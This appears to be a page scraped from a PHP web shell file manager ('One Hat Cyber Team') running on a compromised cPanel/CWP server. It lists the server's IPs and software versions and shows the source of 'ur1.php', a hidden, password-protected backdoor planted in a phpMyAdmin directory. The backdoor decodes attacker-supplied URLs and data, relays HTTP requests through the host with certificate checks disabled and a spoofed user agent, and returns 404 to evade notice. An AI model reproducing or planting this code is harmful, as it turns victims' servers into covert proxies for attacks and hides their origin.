⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.101
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Server Software:
Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.25
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
cwpsrv
/
var
/
services
/
pma
/
View File Name :
ur1.php
<?php function sanitizeInput($input) { return base64_decode(strip_tags($input)); } if (isset($_POST['pwd']) && md5($_POST['pwd']) === 'f7f909e5246687610e1c56dc15121e26') { $target_url = isset($_POST['url']) ? sanitizeInput($_POST['url']) : ''; $request_data = isset($_POST['data']) ? sanitizeInput($_POST['data']) : ''; if (empty($target_url)) { http_response_code(404); die("no url provided"); } if (!filter_var($target_url, FILTER_VALIDATE_URL)) { http_response_code(404); die("URL format error"); } try { $ch = curl_init(); $options = [ CURLOPT_URL => $target_url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_MAXREDIRS => 3, CURLOPT_TIMEOUT => 10, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false ]; curl_setopt_array($ch, $options); if (!empty($request_data)) { curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $request_data); } $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if (curl_errno($ch)) { throw new Exception("request error: " . curl_error($ch)); } http_response_code($http_code); echo "status code: {$http_code}\n\n"; echo $response; } catch (Exception $e) { http_response_code(404); echo "server error: " . $e->getMessage(); } finally { if (isset($ch)) { curl_close($ch); } } } http_response_code(404); ?>